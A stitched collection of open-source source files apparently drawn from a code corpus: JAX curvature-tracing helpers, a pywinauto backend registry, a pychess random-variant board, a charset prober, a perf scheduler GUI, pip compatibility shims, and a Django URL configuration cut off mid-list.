    typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
    jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
    _, loss_tags = extract_tags(jaxpr)
    n = len(loss_tags)
    losses_func = construct_compute_losses_inputs(jaxpr, consts, n,
                                                  primals, params_index)
    # Differentiate only w.r.t. the parameters entry of `primals`.
    primals = (primals[params_index],)
    tangents = (params_tangents,)
    (primals_out, tangents_out) = jax.jvp(losses_func, primals, tangents)
    # Keep only the tangents of the true loss inputs, dropping any targets.
    tangents_out = tuple(tuple(t[:tag.primitive.num_inputs])
                         for t, tag in zip(tangents_out, loss_tags))
    losses = tuple(tag.primitive.loss(*inputs, weight=tag.params["weight"])
                   for tag, inputs in zip(loss_tags, primals_out))
    return losses, tangents_out
  return jvp
def trace_losses_matrix_vector_hvp(tagged_func, params_index=0):
  """Returns the Hessian vector product function of **the tagged losses**, rather than the output value of `tagged_func`."""
  # The function uses backward-over-forward mode.
  def hvp(primals, params_tangents):
    # Trace the tagged function and locate its loss-tag equations.
    typed_jaxpr = jax.make_jaxpr(tagged_func)(*primals)
    jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
    _, loss_tags = extract_tags(jaxpr)
    n = len(loss_tags)
    losses_func = construct_compute_losses_inputs(
        jaxpr, consts, n, primals, params_index)
    def losses_sum(param_primals):
      loss_inputs = losses_func(param_primals)
      losses = [
          _unbox_loss_tag(jaxpr_eqn).loss(
              *inputs, weight=jaxpr_eqn.params["weight"])
          for jaxpr_eqn, inputs in zip(loss_tags, loss_inputs)
      ]
      # This computes the sum of losses evaluated. Makes it easier as we can
      # now use jax.grad rather than jax.vjp for taking derivatives.
      return sum(jnp.sum(loss.evaluate(None)) for loss in losses)
    def grads_times_tangents(params_primals):
      # Scalar <grad(losses_sum), tangents>; its gradient is the HVP.
      grads = jax.grad(losses_sum)(params_primals)
      return utils.inner_product(grads, params_tangents)
    return jax.grad(grads_times_tangents)(primals[params_index])
  return hvp
def trace_estimator_vjp(tagged_func: _Function) -> _Function:
  """Creates the function needed for an estimator of curvature matrices.

  Args:
    tagged_func: A function that has been annotated with tags both for layers
      and losses.

  Returns:
    A function with the same signature as `tagged_func`, which when provided
    with inputs returns two things:
    1. The instances of all loss objects that are tagged.
    2. A second function, which when provided with tangent vectors for each
      of the loss instances' parameters, returns for every tagged layer a
      dictionary containing the following elements:
        inputs - The primal values of the inputs to the layer.
        outputs - The primal values of the outputs to the layer.
        params - The primal values of the layer.
        inputs_tangent - The tangent values of the layer inputs, given the
          provided tangents of the losses.
        outputs_tangent - The tangent values of the layer outputs, given the
          provided tangents of the losses.
        params_tangent - The tangent values of the layer parameters, given
          the provided tangents of the losses.
  """
  def full_vjp_func(func_args):
    # Trace the tagged function
    typed_jaxpr = jax.make_jaxpr(tagged_func)(*func_args)
    jaxpr, consts = typed_jaxpr.jaxpr, typed_jaxpr.literals
    layer_tags, loss_tags = extract_tags(jaxpr)
    # All distinct variables that feed any layer tag.
    layer_vars_flat = jax.tree_flatten([tag.invars for tag in layer_tags])[0]
    layer_input_vars = tuple(set(layer_vars_flat))
    def forward():
      """Evaluates the jaxpr and returns the primal values of all layer inputs."""
      own_func_args = func_args
      # Mapping from variable -> value
      env = dict()
      read = functools.partial(tgm.read_env, env)
      write = functools.partial(tgm.write_env, env)
      # Bind args and consts to environment
      write(jax.core.unitvar, jax.core.unit)
      jax_util.safe_map(write, jaxpr.invars, jax.tree_flatten(own_func_args)[0])
      jax_util.safe_map(write, jaxpr.constvars, consts)
      # Loop through equations and evaluate primitives using `bind`
      num_losses_passed = 0
      for eqn in jaxpr.eqns:
        tgm.evaluate_eqn(eqn, jax_util.safe_map(read, eqn.invars), write)
        if isinstance(eqn.primitive, tags.LossTag):
          num_losses_passed += 1
          if num_losses_passed == len(loss_tags):
            break
      if num_losses_passed != len(loss_tags):
        raise ValueError("This should be unreachable.")
      return jax_util.safe_map(read, layer_input_vars)
    def forward_aux(aux):
      """Like forward(), but offsets each layer-input value by aux[var] so
      that jax.vjp through this function yields tangents per variable."""
      own_func_args = func_args
      # Mapping from variable -> value
      env = dict()
      read = functools.partial(tgm.read_env, env)
      def write(var, val):
        if not isinstance(var, (jax.core.Literal, jax.core.UnitVar)):
          val = val + aux[var] if var in aux else val
        env[var] = val
      # Bind args and consts to environment
      write(jax.core.unitvar, jax.core.unit)
      jax_util.safe_map(write, jaxpr.invars, jax.tree_flatten(own_func_args)[0])
      jax_util.safe_map(write, jaxpr.constvars, consts)
      # Loop through equations and evaluate primitives using `bind`
      num_losses_passed = 0
      losses_inputs_values = []
      losses_kwargs_values = []
      for eqn in jaxpr.eqns:
        input_values = jax_util.safe_map(read, eqn.invars)
        tgm.evaluate_eqn(eqn, input_values, write)
        if isinstance(eqn.primitive, tags.LossTag):
          loss = eqn.primitive.loss(*input_values, weight=eqn.params["weight"])
          losses_inputs_values.append(loss.inputs)
          losses_kwargs_values.append(dict(
              targets=loss.targets,
              weight=eqn.params["weight"]
          ))
          num_losses_passed += 1
          if num_losses_passed == len(loss_tags):
            break
      if num_losses_passed != len(loss_tags):
        raise ValueError("This should be unreachable.")
      # Read the inputs to the loss functions, but also return the target values
      return tuple(losses_inputs_values), tuple(losses_kwargs_values)
    layer_input_values = forward()
    primals_dict = dict(zip(layer_input_vars, layer_input_values))
    primals_dict.update(zip(jaxpr.invars, jax.tree_flatten(func_args)[0]))
    # Zero offsets: forward_aux(aux_dict) reproduces the primal evaluation.
    aux_values = jax.tree_map(jnp.zeros_like, layer_input_values)
    aux_dict = dict(zip(layer_input_vars, aux_values))
    losses_args, aux_vjp, losses_kwargs = jax.vjp(forward_aux, aux_dict,
                                                  has_aux=True)
    losses = tuple(tag.primitive.loss(*inputs, **kwargs)
                   for tag, inputs, kwargs in
                   zip(loss_tags, losses_args, losses_kwargs))
    def vjp_func(tangents):
      # Pull the loss tangents back to every intermediate variable.
      all_tangents = aux_vjp(tangents)
      tangents_dict, inputs_tangents = all_tangents[0], all_tangents[1:]
      inputs_tangents = jax.tree_flatten(inputs_tangents)[0]
      tangents_dict.update(zip(jaxpr.invars, inputs_tangents))
      read_primals = functools.partial(tgm.read_env, primals_dict)
      read_tangents = functools.partial(tgm.read_env, tangents_dict)
      layers_info = []
      for jaxpr_eqn in layer_tags:
        layer_tag = _unbox_layer_tag(jaxpr_eqn)
        info = dict()
        primals = jax_util.safe_map(read_primals, tuple(jaxpr_eqn.invars))
        (
            info["outputs"],
            info["inputs"],
            info["params"],
        ) = layer_tag.split_all_inputs(primals)
        tangents = jax_util.safe_map(read_tangents, tuple(jaxpr_eqn.invars))
        (
            info["outputs_tangent"],
            info["inputs_tangent"],
            info["params_tangent"],
        ) = layer_tag.split_all_inputs(tangents)
        layers_info.append(info)
      return tuple(layers_info)
    return losses, vjp_func
  return full_vjp_func
| apache-2.0 |
vasily-v-ryabov/pywinauto | pywinauto/backend.py | 4 | 4186 | # GUI Application automation and testing library
# Copyright (C) 2006-2018 Mark Mc Mahon and Contributors
# https://github.com/pywinauto/pywinauto/graphs/contributors
# http://pywinauto.readthedocs.io/en/latest/credits.html
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of pywinauto nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Back-end components storage (links to platform-specific things)"""
from .element_info import ElementInfo
from .base_wrapper import BaseWrapper
class BackEnd(object):

    """Minimal back-end description (name & 2 required base classes)"""

    def __init__(self, name, element_info_class, generic_wrapper_class):
        """Init back-end description

        Raises TypeError if either class argument is not derived from the
        required pywinauto base class.
        """
        self.name = name
        if not issubclass(element_info_class, ElementInfo):
            raise TypeError('element_info_class should be a class derived from ElementInfo')
        if not issubclass(generic_wrapper_class, BaseWrapper):
            # Fixed: this message previously (incorrectly) blamed element_info_class.
            raise TypeError('generic_wrapper_class should be a class derived from BaseWrapper')
        self.element_info_class = element_info_class
        self.generic_wrapper_class = generic_wrapper_class
class BackendsRegistry(object):

    """Registry of available back-ends plus the one currently in use"""

    def __init__(self):
        """Start with an empty registry and no active back-end selected"""
        self.backends = {}
        self.active_backend = None

    @property
    def name(self):
        """Identifier string of the active back-end"""
        return self.active_backend.name

    @property
    def element_class(self):
        """Return :py:class:`.element_info.ElementInfo`'s subclass of the active backend"""
        return self.active_backend.element_info_class

    @property
    def wrapper_class(self):
        """BaseWrapper subclass provided by the active back-end"""
        return self.active_backend.generic_wrapper_class
registry = BackendsRegistry()
def name():
    """Return name of the active backend"""
    # Module-level convenience wrapper over the singleton registry.
    return registry.name
def element_class():
    """Return :py:class:`.element_info.ElementInfo`'s subclass of the active backend"""
    # Module-level convenience wrapper over the singleton registry.
    return registry.element_class
def wrapper_class():
    """Return BaseWrapper's subclass of the active backend"""
    # Module-level convenience wrapper over the singleton registry.
    return registry.wrapper_class
def activate(name):
    """
    Make the back-end registered under *name* the active one

    Possible values of **name** are "win32", "uia" or
    any other name registered via the :py:func:`register` function.
    """
    try:
        backend = registry.backends[name]
    except KeyError:
        raise ValueError('Back-end "{backend}" is not registered!'.format(backend=name))
    registry.active_backend = backend
def register(name, element_info_class, generic_wrapper_class):
    """Register a new backend"""
    # Validation of the two classes happens inside BackEnd.__init__.
    registry.backends[name] = BackEnd(name, element_info_class, generic_wrapper_class)
| bsd-3-clause |
RosiePy/pychess | lib/pychess/Variants/asymmetricrandom.py | 20 | 4155 | from __future__ import print_function
# AsymmetricRandom Chess
import random
from pychess.Utils.const import *
from pychess.Utils.Board import Board
class AsymmetricRandomBoard(Board):
    # Board subclass that generates an independent random back rank for each
    # side, keeping only the bishops' square colors balanced between them.
    variant = ASYMMETRICRANDOMCHESS

    def __init__ (self, setup=False, lboard=None):
        if setup is True:
            # Generate a fresh random starting position (FEN string).
            Board.__init__(self, setup=self.asymmetricrandom_start(), lboard=lboard)
        else:
            Board.__init__(self, setup=setup, lboard=lboard)

    def asymmetricrandom_start(self):
        """Return a FEN string for a random asymmetric starting position.

        Seven pieces are drawn (with repetition, via the duplicated
        population) from r/n/b/q plus exactly one king per side; white and
        black get independently shuffled arrangements.
        """
        white = random.sample(('r', 'n', 'b', 'q')*16, 7)
        white.append('k')
        black = white[:]
        random.shuffle(white)
        random.shuffle(black)
        # balance the bishops (put them on equal numbers of dark and light squares)
        whitedarkbishops = 0
        whitelightbishops = 0
        for index, piece in enumerate(white):
            if piece == 'b':
                if index % 2 == 0: # even numbered square on the A rank are dark
                    whitedarkbishops += 1
                else:
                    whitelightbishops += 1
        blackdarkbishops = 0
        blacklightbishops = 0
        blackbishoprandomindexstack = []
        for index, piece in enumerate(black):
            if piece == 'b':
                if index % 2 == 1: # odd numbered squares on the H rank are dark
                    blackdarkbishops += 1
                else:
                    blacklightbishops += 1
                blackbishoprandomindexstack.append(index)
        random.shuffle(blackbishoprandomindexstack)

        # Iterator yielding (index, piece) of a pieces list in random order.
        # NOTE: uses the Python 2 iterator protocol (`next` method) and
        # shuffles a `range(8)` list -- Python 2 only.
        class RandomEnumeratePieces:
            def __init__ (self, pieces):
                self.pieces = pieces[:]
                self.randomindexstack = range(8)
                random.shuffle(self.randomindexstack)
            def __iter__ (self):
                return self
            def next(self):
                if not self.randomindexstack:
                    raise StopIteration
                else:
                    randomindex = self.randomindexstack.pop()
                    return randomindex, self.pieces[randomindex]

        # Repeatedly swap a mismatched black bishop with a random non-bishop
        # on an opposite-colored square until both sides' bishop counts on
        # dark and light squares agree.
        while (whitedarkbishops != blackdarkbishops) or \
              (whitelightbishops != blacklightbishops):
            bishopindex = blackbishoprandomindexstack.pop()
            for index, piece in RandomEnumeratePieces(black):
                if piece != 'b':
                    if ((blackdarkbishops > whitedarkbishops) and \
                        (bishopindex % 2 == 1) and (index % 2 == 0)):
                        # Move a dark-squared black bishop to a light square.
                        black[bishopindex] = piece
                        black[index] = 'b'
                        blacklightbishops += 1
                        blackdarkbishops = blackdarkbishops > 0 and (blackdarkbishops-1) or 0
                        break
                    elif ((blacklightbishops > whitelightbishops) and \
                          (bishopindex % 2 == 0) and (index % 2 == 1)):
                        # Move a light-squared black bishop to a dark square.
                        black[bishopindex] = piece
                        black[index] = 'b'
                        blackdarkbishops += 1
                        blacklightbishops = blacklightbishops > 0 and (blacklightbishops-1) or 0
                        break
        # Assemble the FEN: black back rank, pawns, empty ranks, white pawns,
        # white back rank (uppercased), white to move, no castling rights.
        tmp = ''.join(black) + '/pppppppp/8/8/8/8/PPPPPPPP/' + \
              ''.join(white).upper() + ' w - - 0 1'
        return tmp
class AsymmetricRandomChess:
    # Variant descriptor consumed by the variants framework; the _() strings
    # are gettext-translated and must not be altered.
    __desc__ = \
    _("FICS wild/4: http://www.freechess.org/Help/HelpFiles/wild.html\n" +
      "* Randomly chosen pieces (two queens or three rooks possible)\n" +
      "* Exactly one king of each color\n" +
      "* Pieces placed randomly behind the pawns, SUBJECT TO THE CONSTRAINT THAT THE BISHOPS ARE BALANCED\n" +
      "* No castling\n" +
      "* Black's arrangement DOES NOT mirrors white's")
    name = _("Asymmetric Random")
    # Name used by CECP (xboard) protocol engines for this variant.
    cecp_name = "unknown"
    board = AsymmetricRandomBoard
    need_initial_board = True
    standard_rules = True
    variant_group = VARIANTS_SHUFFLE
if __name__ == '__main__':
    # Smoke test: print a handful of random starting FENs.
    # Renamed the local from 'Board' to 'board' so it no longer shadows the
    # imported Board class.
    board = AsymmetricRandomBoard(True)
    for i in range(10):
        print(board.asymmetricrandom_start())
| gpl-3.0 |
DennisDenuto/puppet-commonscripts | files/aws_cli/AWS-ElasticBeanstalk-CLI-2.6.3/eb/macosx/python3/lib/aws/requests/packages/charade/mbcharsetprober.py | 2924 | 3268 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Universal charset detector code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 2001
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
# Shy Shalom - original C code
# Proofpoint, Inc.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
import sys
from . import constants
from .charsetprober import CharSetProber
class MultiByteCharSetProber(CharSetProber):
    """Base prober for multi-byte charsets: drives a coding state machine
    over the input and feeds complete characters to a distribution analyzer.
    Subclasses supply _mCodingSM, _mDistributionAnalyzer and the name."""

    def __init__(self):
        CharSetProber.__init__(self)
        self._mDistributionAnalyzer = None
        self._mCodingSM = None
        # Rolling two-byte window: [previous buffer's last byte, current byte].
        self._mLastChar = [0, 0]

    def reset(self):
        CharSetProber.reset(self)
        if self._mCodingSM:
            self._mCodingSM.reset()
        if self._mDistributionAnalyzer:
            self._mDistributionAnalyzer.reset()
        self._mLastChar = [0, 0]

    def get_charset_name(self):
        # Abstract: concrete probers return their charset name.
        pass

    def feed(self, aBuf):
        """Consume a chunk of bytes and return the updated detection state."""
        aLen = len(aBuf)
        for i in range(0, aLen):
            codingState = self._mCodingSM.next_state(aBuf[i])
            if codingState == constants.eError:
                if constants._debug:
                    sys.stderr.write(self.get_charset_name()
                                     + ' prober hit error at byte ' + str(i)
                                     + '\n')
                self._mState = constants.eNotMe
                break
            elif codingState == constants.eItsMe:
                self._mState = constants.eFoundIt
                break
            elif codingState == constants.eStart:
                # A full character just completed; hand it to the analyzer.
                charLen = self._mCodingSM.get_current_charlen()
                if i == 0:
                    # Character may straddle the previous buffer boundary.
                    self._mLastChar[1] = aBuf[0]
                    self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
                else:
                    self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
                                                     charLen)

        # Remember the last byte for cross-buffer characters.
        self._mLastChar[0] = aBuf[aLen - 1]

        if self.get_state() == constants.eDetecting:
            # Shortcut: declare success once confidence is high enough.
            if (self._mDistributionAnalyzer.got_enough_data() and
                    (self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
                self._mState = constants.eFoundIt

        return self.get_state()

    def get_confidence(self):
        return self._mDistributionAnalyzer.get_confidence()
| mit |
agat63/E4GT_FH13_kernel | tools/perf/scripts/python/Perf-Trace-Util/lib/Perf/Trace/SchedGui.py | 12980 | 5411 | # SchedGui.py - Python extension for perf script, basic GUI code for
# traces drawing and overview.
#
# Copyright (C) 2010 by Frederic Weisbecker <fweisbec@gmail.com>
#
# This software is distributed under the terms of the GNU General
# Public License ("GPL") version 2 as published by the Free Software
# Foundation.
# Fail early with a helpful message if wxPython is missing.
# NOTE: Python 2 raise syntax -- this script targets Python 2 only.
try:
    import wx
except ImportError:
    raise ImportError, "You need to install the wxpython lib for this script"
class RootFrame(wx.Frame):
    """Main window: draws scheduler trace rectangles on a scrollable,
    zoomable canvas and forwards mouse/keyboard events to the tracer."""
    Y_OFFSET = 100          # top margin above the first row, in pixels
    RECT_HEIGHT = 100       # height of one rectangle row
    RECT_SPACE = 50         # vertical gap between rows
    EVENT_MARKING_WIDTH = 5 # height of the event-marker strip atop a rect

    def __init__(self, sched_tracer, title, parent = None, id = -1):
        wx.Frame.__init__(self, parent, id, title)

        (self.screen_width, self.screen_height) = wx.GetDisplaySize()
        self.screen_width -= 10
        self.screen_height -= 10
        self.zoom = 0.5
        self.scroll_scale = 20
        self.sched_tracer = sched_tracer
        self.sched_tracer.set_root_win(self)
        (self.ts_start, self.ts_end) = sched_tracer.interval()
        self.update_width_virtual()
        self.nr_rects = sched_tracer.nr_rectangles() + 1
        self.height_virtual = RootFrame.Y_OFFSET + (self.nr_rects * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))

        # whole window panel
        self.panel = wx.Panel(self, size=(self.screen_width, self.screen_height))

        # scrollable container
        self.scroll = wx.ScrolledWindow(self.panel)
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale)
        self.scroll.EnableScrolling(True, True)
        self.scroll.SetFocus()

        # scrollable drawing area
        self.scroll_panel = wx.Panel(self.scroll, size=(self.screen_width - 15, self.screen_height / 2))
        self.scroll_panel.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll_panel.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll_panel.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)
        self.scroll.Bind(wx.EVT_PAINT, self.on_paint)
        self.scroll.Bind(wx.EVT_KEY_DOWN, self.on_key_press)
        self.scroll.Bind(wx.EVT_LEFT_DOWN, self.on_mouse_down)

        self.scroll.Fit()
        self.Fit()

        self.scroll_panel.SetDimensions(-1, -1, self.width_virtual, self.height_virtual, wx.SIZE_USE_EXISTING)

        self.txt = None

        self.Show(True)

    def us_to_px(self, val):
        # Convert a microsecond interval to pixels at the current zoom.
        return val / (10 ** 3) * self.zoom

    def px_to_us(self, val):
        # Inverse of us_to_px.
        return (val / self.zoom) * (10 ** 3)

    def scroll_start(self):
        # Current scroll origin in pixels.
        (x, y) = self.scroll.GetViewStart()
        return (x * self.scroll_scale, y * self.scroll_scale)

    def scroll_start_us(self):
        # Current horizontal scroll origin in microseconds.
        (x, y) = self.scroll_start()
        return self.px_to_us(x)

    def paint_rectangle_zone(self, nr, color, top_color, start, end):
        """Draw one rectangle on row `nr`, optionally with an event-marker
        strip of `top_color` along its top edge."""
        offset_px = self.us_to_px(start - self.ts_start)
        width_px = self.us_to_px(end - self.ts_start)

        offset_py = RootFrame.Y_OFFSET + (nr * (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE))
        width_py = RootFrame.RECT_HEIGHT

        dc = self.dc

        if top_color is not None:
            (r, g, b) = top_color
            top_color = wx.Colour(r, g, b)
            brush = wx.Brush(top_color, wx.SOLID)
            dc.SetBrush(brush)
            dc.DrawRectangle(offset_px, offset_py, width_px, RootFrame.EVENT_MARKING_WIDTH)
            width_py -= RootFrame.EVENT_MARKING_WIDTH
            offset_py += RootFrame.EVENT_MARKING_WIDTH

        (r ,g, b) = color
        color = wx.Colour(r, g, b)
        brush = wx.Brush(color, wx.SOLID)
        dc.SetBrush(brush)
        dc.DrawRectangle(offset_px, offset_py, width_px, width_py)

    def update_rectangles(self, dc, start, end):
        # Ask the tracer to (re)paint the visible time window.
        start += self.ts_start
        end += self.ts_start
        self.sched_tracer.fill_zone(start, end)

    def on_paint(self, event):
        dc = wx.PaintDC(self.scroll_panel)
        self.dc = dc

        width = min(self.width_virtual, self.screen_width)
        (x, y) = self.scroll_start()
        start = self.px_to_us(x)
        end = self.px_to_us(x + width)
        self.update_rectangles(dc, start, end)

    def rect_from_ypixel(self, y):
        # Map a y pixel coordinate to a row index, or -1 if in a gap/margin.
        y -= RootFrame.Y_OFFSET
        rect = y / (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)
        height = y % (RootFrame.RECT_HEIGHT + RootFrame.RECT_SPACE)

        if rect < 0 or rect > self.nr_rects - 1 or height > RootFrame.RECT_HEIGHT:
            return -1

        return rect

    def update_summary(self, txt):
        # Replace the summary text widget below the canvas.
        if self.txt:
            self.txt.Destroy()
        self.txt = wx.StaticText(self.panel, -1, txt, (0, (self.screen_height / 2) + 50))

    def on_mouse_down(self, event):
        (x, y) = event.GetPositionTuple()
        rect = self.rect_from_ypixel(y)
        if rect == -1:
            return

        t = self.px_to_us(x) + self.ts_start

        self.sched_tracer.mouse_down(rect, t)

    def update_width_virtual(self):
        self.width_virtual = self.us_to_px(self.ts_end - self.ts_start)

    def __zoom(self, x):
        # Recompute the virtual width and keep timestamp x at the view start.
        self.update_width_virtual()
        (xpos, ypos) = self.scroll.GetViewStart()
        xpos = self.us_to_px(x) / self.scroll_scale
        self.scroll.SetScrollbars(self.scroll_scale, self.scroll_scale, self.width_virtual / self.scroll_scale, self.height_virtual / self.scroll_scale, xpos, ypos)
        self.Refresh()

    def zoom_in(self):
        x = self.scroll_start_us()
        self.zoom *= 2
        self.__zoom(x)

    def zoom_out(self):
        x = self.scroll_start_us()
        self.zoom /= 2
        self.__zoom(x)

    def on_key_press(self, event):
        # '+'/'-' zoom; arrow keys scroll one unit in each direction.
        key = event.GetRawKeyCode()
        if key == ord("+"):
            self.zoom_in()
            return
        if key == ord("-"):
            self.zoom_out()
            return

        key = event.GetKeyCode()
        (x, y) = self.scroll.GetViewStart()
        if key == wx.WXK_RIGHT:
            self.scroll.Scroll(x + 1, y)
        elif key == wx.WXK_LEFT:
            self.scroll.Scroll(x - 1, y)
        elif key == wx.WXK_DOWN:
            self.scroll.Scroll(x, y + 1)
        elif key == wx.WXK_UP:
            self.scroll.Scroll(x, y - 1)
| gpl-2.0 |
ljnutal6/media-recommend | app/virtualenvs/recommedia/lib/python2.7/site-packages/pip/backwardcompat/__init__.py | 80 | 3119 | """Stuff that differs in different Python versions"""
import os
import imp
import sys
import site
__all__ = ['WindowsError']
uses_pycache = hasattr(imp, 'cache_from_source')
class NeverUsedException(Exception):
    """this exception should never be raised; it stands in for exception
    types that do not exist on the running Python version"""
# On non-Windows platforms WindowsError is undefined; alias it to a dummy
# exception type so `except WindowsError` clauses stay valid everywhere.
try:
    WindowsError = WindowsError
except NameError:
    WindowsError = NeverUsedException

try:
    #new in Python 3.3
    PermissionError = PermissionError
except NameError:
    PermissionError = NeverUsedException

# Encoding of the original (unredirected) stdout stream.
console_encoding = sys.__stdout__.encoding
# Version-specific aliases: expose a single set of names (StringIO, urllib2,
# b/u, console_to_str, ...) regardless of whether we run on Python 2 or 3.
if sys.version_info >= (3,):
    from io import StringIO, BytesIO
    from functools import reduce
    from urllib.error import URLError, HTTPError
    from queue import Queue, Empty
    from urllib.request import url2pathname
    from urllib.request import urlretrieve
    from email import message as emailmessage
    import urllib.parse as urllib
    import urllib.request as urllib2
    import configparser as ConfigParser
    import xmlrpc.client as xmlrpclib
    import urllib.parse as urlparse
    import http.client as httplib

    def cmp(a, b):
        # Replacement for the builtin removed in Python 3.
        return (a > b) - (a < b)

    def b(s):
        # str -> UTF-8 bytes.
        return s.encode('utf-8')

    def u(s):
        # UTF-8 bytes -> str.
        return s.decode('utf-8')

    def console_to_str(s):
        # Decode console output, falling back to UTF-8 on failure.
        try:
            return s.decode(console_encoding)
        except UnicodeDecodeError:
            return s.decode('utf_8')

    def fwrite(f, s):
        # Write text to a binary-capable stream via its buffer.
        f.buffer.write(b(s))

    def get_http_message_param(http_message, param, default_value):
        return http_message.get_param(param, default_value)

    bytes = bytes
    string_types = (str,)
    raw_input = input
else:
    from cStringIO import StringIO
    from urllib2 import URLError, HTTPError
    from Queue import Queue, Empty
    from urllib import url2pathname, urlretrieve
    from email import Message as emailmessage
    import urllib
    import urllib2
    import urlparse
    import ConfigParser
    import xmlrpclib
    import httplib

    # On Python 2 these are no-ops / passthroughs.
    def b(s):
        return s

    def u(s):
        return s

    def console_to_str(s):
        return s

    def fwrite(f, s):
        f.write(s)

    def get_http_message_param(http_message, param, default_value):
        result = http_message.getparam(param)
        return result or default_value

    bytes = str
    string_types = (basestring,)
    reduce = reduce
    cmp = cmp
    raw_input = raw_input
    BytesIO = StringIO
from distutils.sysconfig import get_python_lib, get_python_version

#site.USER_SITE was created in py2.6
user_site = getattr(site, 'USER_SITE', None)
def product(*args, **kwds):
    """Pure-Python cartesian product (back-port of itertools.product).

    product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy
    product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111
    """
    repeat = kwds.get('repeat', 1)
    pools = [tuple(arg) for arg in args] * repeat
    combos = [()]
    for pool in pools:
        combos = [combo + (item,) for combo in combos for item in pool]
    for combo in combos:
        yield combo
## only >=py32 has ssl.match_hostname and ssl.CertificateError
# Fall back to the bundled backport module on older Pythons.
try:
    from ssl import match_hostname, CertificateError
except ImportError:
    from ssl_match_hostname import match_hostname, CertificateError
| gpl-2.0 |
tongxindao/Flask-micblog | MoocOnline/web/djangomooc/djangomooc/urls.py | 1 | 2567 | # _*_ coding: utf-8 _*_
__author__ = 'tongxindao'
"""djangomooc URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Import the include() function: from django.conf.urls import url, include
3. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import url, include
from django.views.static import serve
import xadmin
from users.views import LoginView, RegisterView, \
ActiveUserView, ForgetPwdView, ResetView, \
ModifyPwdView, LogOutView, IndexView
from djangomooc.settings import MEDIA_ROOT\
, STATIC_ROOT
urlpatterns = [
    url(r'^xadmin/', xadmin.site.urls),
    url(r'^$', IndexView.as_view(), name="index"),
    url(r'^register/$', RegisterView.as_view(), name="register"),
    url(r'^login/$', LoginView.as_view(), name="login"),
    url(r'^logout/$', LogOutView.as_view(), name="logout"),
    url(r'^captcha/', include('captcha.urls')),
    url(r'^active/(?P<active_code>.*)/$', ActiveUserView.as_view(), name="user_active"),
    # templates must reverse URLs by the 'name' value here, otherwise
    # Django raises NoReverseMatch
    url(r'^forget/$', ForgetPwdView.as_view(), name="forget_pwd"),
    url(r'^reset/(?P<reset_code>.*)/$', ResetView.as_view(), name="reset_pwd"),
    url(r'^modify_pwd/$', ModifyPwdView.as_view(), name="modify_pwd"),
    # course-organization URLs
    url(r'^org/', include('organization.urls', namespace="org")),
    # course URLs
    url(r'^course/', include('courses.urls', namespace="course")),
    # user-account URLs
    url(r'^users/', include('users.urls', namespace="users")),
    # serve uploaded media files through the static-file view
    url(r'^media/(?P<path>.*)$', serve, {"document_root": MEDIA_ROOT}),
    # serves collected static assets when settings.DEBUG is True
    url(r'^static/(?P<path>.*)$', serve, {"document_root": STATIC_ROOT}),
    # rich-text editor (DjangoUeditor) URLs
